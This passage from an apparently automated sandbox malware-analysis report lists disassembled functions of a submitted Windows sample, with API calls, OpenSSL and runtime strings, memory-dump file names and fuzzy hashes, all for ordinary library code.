                                                                                                                                                                                                                              • API String ID: 1995843185-0
                                                                                                                                                                                                                              • Opcode ID: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                              • Instruction ID: d06ffde680406260486f63c0c7c1bf524c478be2b27d3e15fd0cd3de7b4515aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaba8413391d0e4b0f15a030ceca06c547fe89b67491544b9257196f0b72f74b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71218332B1CA6586FB648FA2E805B6D6651FF84BD4F448430DE0D07B94EF3CE5568605
                                                                                                                                                                                                                              Function 00007FF7EAD29368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: 1f19412b6e179195adf8c0d28e5bfbfa09cfc95307ff25947d789b3e9eedac2b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118232E5CB0301FA78B165E4A13799350EF59360E840EB6EA6E163DECE7C6942C132
                                                                                                                                                                                                                              Function 00007FF7EAD1B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3AF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3CE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B3F6
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B407
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF7EAD1A5A3,?,?,00000000,00007FF7EAD1A83E,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1B418
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                              • Instruction ID: 2b94987a55666d7648b7d66308c2c78518f251fa95b715d1dc404e7d8e5d04f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611FE20F0964241FA54F735A551379D395DF647B0FC882B7D92D476DEDD3CA8418222
                                                                                                                                                                                                                              Function 00007FF7EAD1B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                              • Instruction ID: d973e7f787f7056620904f9625f94c61a3d09728259864a0b272a578929d0dd1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1011F520E0960741FA58F27155523BE9382DF6A330F8847B7D92E4A6DADD3CB8445233
                                                                                                                                                                                                                              Function 00007FF7EAD15FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 6ba1e51ca70c65bd71bd0112676f57214e957a2231fe0b48fe2598bebb14c8a0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A91CF62A08A4681F765EE34D4503BDB7A1EB60B94FC441B7DA5D833DBDE3CE8458322
                                                                                                                                                                                                                              Function 00007FF7EAD1FBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction ID: 5dff4ca135240d0c977675bb2e43161060b7d3a62dbc8659e9e51c794e8daede
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E881AE76E0860385F764FE398140378A7E1EB29B44FD548B7CA099729DCB3CE902D223
                                                                                                                                                                                                                              Function 00007FF8E7A22469 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F8751250
                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_server_name
                                                                                                                                                                                                                              • API String ID: 4189947146-4157686371
                                                                                                                                                                                                                              • Opcode ID: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                              • Instruction ID: 2d71aadb9e0b32e711d3d6e5e1b2f0db0d9365fdf4c15c8ca5e0b03cbb6067e4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df7c5cc1c5450ab236299e71f02084b029a770e3f54b11b68fceadd1af193070
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B612521F1CA8241F7619BE1E4127BE6391EF857C4F484036EE6D4BA86EF2CE5908702
                                                                                                                                                                                                                              Function 00007FF8E7A4F070 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F9060208
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new$ssl_get_new_session
                                                                                                                                                                                                                              • API String ID: 3464486852-2527649602
                                                                                                                                                                                                                              • Opcode ID: 443d78a4e3b3249df96229489038a3b10db514096114595ff1d68b200bf7cc61
                                                                                                                                                                                                                              • Instruction ID: a71305a7348b7528735c4420c908437be6bd95b0f1a8920254d7020936fa9126
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 443d78a4e3b3249df96229489038a3b10db514096114595ff1d68b200bf7cc61
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2271AD21B08AC282FB48DBA5E8567FD3291EB84BC4F584135DA2D477D6EF3DE5918302
                                                                                                                                                                                                                              Function 00007FF7EAD0D648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction ID: ab2047001a50b041f61c36572c0e40ef350eed9651f876fd83d0bfdca23d7181
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2518132A196028AEB14EB15E484779B792EF84B9CF904177EA8E4774CDF7CE841C711
                                                                                                                                                                                                                              Function 00007FF7EAD0F288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                              • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction ID: 32d7097a487a524cb60571632e0e6ec79fd7304bc9c24c450ee0a39434292182
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0951823260834286FB64EA21908436EB7D6FB59B98FA48177DA4C47B89CF3CE451C712
                                                                                                                                                                                                                              Function 00007FF7EAD0EED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                              • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction ID: d21d4bc1030ff94c50f310ac91b866b3a8e9e89ecb24f393cdf84b1a0ba57750
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D618232908BC585E760EB25E4803AEB7A1FB98788F544276EB9C03759CF7CD190CB11
                                                                                                                                                                                                                              Function 00007FF8E79621E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F906026570
                                                                                                                                                                                                                              • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                              • API String ID: 1666080152-87138338
                                                                                                                                                                                                                              • Opcode ID: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                              • Instruction ID: 4aa9079d802410afe4e66de35c465f2f2314a02e11a8fee58e2971c68e0e8e82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a963b875801d9843ea49cd289ad9d5ca77fa3890532c8e824ee28ee48ef07934
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4241E3B2B0864386EB14AFD8E44836D6752EF91BD0F544330EA7946AE9DF3CD5028B41
                                                                                                                                                                                                                              Function 00007FF8E7A219DD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007E6784
                                                                                                                                                                                                                              • String ID: ..\s\ssl\tls_srp.c
                                                                                                                                                                                                                              • API String ID: 3284476089-1778748169
                                                                                                                                                                                                                              • Opcode ID: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                              • Instruction ID: c3847b679368f1c5733ec763b45dcc74e8eb7b594c62e8d59a61578999a180df
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5de455a0e33419aeed79645b2a849e8fb5092a76a7a5c4db12254346f5210564
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB413F65B0BA8380EA55AFE1E4527BC3292AF41FC8F184574DE7D0BBC9DF2CA4518212
                                                                                                                                                                                                                              Function 00007FF7EAD07E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF7EAD0352C,?,00000000,00007FF7EAD03F23), ref: 00007FF7EAD07F32
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
